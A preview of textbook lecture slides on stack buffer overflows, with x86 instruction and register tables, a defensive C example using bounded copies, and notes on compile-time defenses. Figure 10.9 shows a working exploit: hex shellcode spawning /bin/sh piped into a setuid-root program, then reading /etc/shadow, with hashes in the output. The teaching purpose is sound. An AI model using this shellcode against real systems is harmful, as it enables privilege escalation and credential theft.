Example unix shellcode common x86 assembly language

This preview shows page 20 - 27 out of 40 pages.

Example UNIX Shellcode

Common x86 Assembly Language Instructions

MOV src, dest              copy (move) value from src into dest
LEA src, dest              copy the address (load effective address) of src into dest
ADD / SUB src, dest        add / subtract value in src to / from dest, leaving result in dest
AND / OR / XOR src, dest   logical and / or / xor value in src with dest, leaving result in dest
CMP val1, val2             compare val1 and val2, setting CPU flags as a result
JMP / JZ / JNZ addr        jump / jump if zero / jump if not zero to addr
PUSH src                   push the value in src onto the stack
POP dest                   pop the value on the top of the stack into dest
CALL addr                  call function at addr
LEAVE                      clean up stack frame before leaving function
RET                        return from function
INT num                    software interrupt to access operating system function
NOP                        no operation (do nothing) instruction
x86 Registers

32 bit   16 bit   8 bit (high)   8 bit (low)   Use
%eax     %ax      %ah            %al           Accumulator: used for arithmetic and I/O operations and to execute interrupt calls
%ebx     %bx      %bh            %bl           Base register: used to access memory, pass system call arguments and return values
%ecx     %cx      %ch            %cl           Counter register
%edx     %dx      %dh            %dl           Data register: used for arithmetic operations, interrupt calls and I/O operations
%ebp                                           Base Pointer: contains the address of the current stack frame
%eip                                           Instruction Pointer (Program Counter): contains the address of the next instruction to be executed
%esi                                           Source Index: used as a pointer for string or array operations
%esp                                           Stack Pointer: contains the address of the top of the stack

$ dir -l buffer4
-rwsr-xr-x 1 root knoppix 16571 Jul 17 10:49 buffer4
$ whoami
knoppix
$ cat /etc/shadow
cat: /etc/shadow: Permission denied
$ cat attack1
perl -e 'print pack("H*",
"90909090909090909090909090909090" .
"90909090909090909090909090909090" .
"9090eb1a5e31c08846078d1e895e0889" .
"460cb00b89f38d4e088d560ccd80e8e1" .
"ffffff2f62696e2f7368202020202020" .
"202020202020202038fcffbfc0fbffbf0a");
print "whoami\n";
print "cat /etc/shadow\n";'
$ attack1 | buffer4
Enter value for name: Hello your yyy)DA0Apy is e?^1AFF.../bin/sh...
root
root:$1$rNLId4rX$nka7JlxH7.4UJT4l9JRLk1:13346:0:99999:7:::
daemon:*:11453:0:99999:7:::
...
nobody:*:11453:0:99999:7:::
knoppix:$1$FvZSBKBu$EdSFvuuJdKaCH8Y0IdnAv/:13346:0:99999:7:::
...

Figure 10.9 Example Stack Overflow Attack
Stack Overflow Variants

target program can be:
  - a trusted system utility
  - a network service daemon
  - commonly used library code

shellcode functions:
  - launch a remote shell when connected to
  - create a reverse shell that connects back to the hacker
  - use local exploits that establish a shell
  - flush firewall rules that currently block other attacks
  - break out of a chroot (restricted execution) environment, giving full access to the system

Buffer Overflow Defenses

buffer overflows are widely exploited

two broad defense approaches:
  - compile-time: aim to harden new programs so that they resist attacks
  - run-time: aim to detect and abort attacks in existing programs
Compile-Time Defenses: Programming Language

use a modern high-level language
  - not vulnerable to buffer overflow attacks
  - compiler enforces range checks and permissible operations on variables

disadvantages:
  - additional code must be executed at run time to impose the checks
  - flexibility and safety come at a cost in resource use
  - distance from the underlying machine
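The buffer4 program in Figure 10.9 falls because it copies the "name" it reads into a fixed-size stack buffer without checking the length. The following C program is an added example, not code from the slides or from the buffer4 program, showing the compile-time fix that is available even when staying in C: every copy is bounded by the destination size, input is read with fgets() rather than an unbounded read, and truncation is reported instead of silently overwriting the stack. The buffer size NAME_MAX_LEN and the function names are assumptions chosen for the example.

```c
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 16   /* hypothetical buffer size, chosen for this example */

/* Bounded copy of a "name" value into dest, which holds destsz bytes.
 * Unlike an unchecked strcpy()/gets() into a fixed buffer, this can never
 * write past dest, whatever the length of src.
 *
 * Return values:
 *   0  input fitted in dest
 *   1  input was longer than dest could hold and was truncated
 *  -1  invalid arguments (NULL pointer or zero-length destination)
 */
int copy_name_bounded(const char *src, char *dest, size_t destsz)
{
    if (src == NULL || dest == NULL || destsz == 0)
        return -1;

    size_t n = strlen(src);
    int truncated = 0;
    if (n >= destsz) {          /* leave room for the terminating NUL */
        n = destsz - 1;
        truncated = 1;
    }
    memcpy(dest, src, n);
    dest[n] = '\0';
    return truncated;
}

/* Strip the trailing newline that fgets() keeps. Returns the new length. */
size_t strip_newline(char *s)
{
    size_t n = strlen(s);
    if (n > 0 && s[n - 1] == '\n')
        s[--n] = '\0';
    return n;
}

/* Self-check: feed a constructed over-long input (120 'A' bytes, roughly the
 * length of the attack1 payload) into a NAME_MAX_LEN buffer and confirm it is
 * truncated and NUL-terminated rather than overflowing. Returns 1 if every
 * check passes, 0 otherwise. */
int demo_overlong_input(void)
{
    char overlong[121];
    char name[NAME_MAX_LEN];
    memset(overlong, 'A', 120);
    overlong[120] = '\0';

    int rc = copy_name_bounded(overlong, name, sizeof name);
    return rc == 1
        && strlen(name) == NAME_MAX_LEN - 1
        && name[NAME_MAX_LEN - 1] == '\0';
}

int main(void)
{
    char line[256];
    char name[NAME_MAX_LEN];

    printf("Enter value for name: ");
    fflush(stdout);
    /* fgets() writes at most sizeof line bytes, unlike gets() or scanf("%s") */
    if (fgets(line, sizeof line, stdin) == NULL)
        return 1;
    strip_newline(line);

    int rc = copy_name_bounded(line, name, sizeof name);
    if (rc == 1)
        fprintf(stderr, "warning: name truncated to %d characters\n", NAME_MAX_LEN - 1);
    printf("Hello, your name is %s\n", name);
    return 0;
}
```

Piping the attack1 output of Figure 10.9 into this version produces only a truncated, harmless name string and a warning on stderr; the saved return address on the stack is never reached because no write can exceed sizeof name. The pattern generalizes: treat the destination size, not the input length, as the bound of every copy.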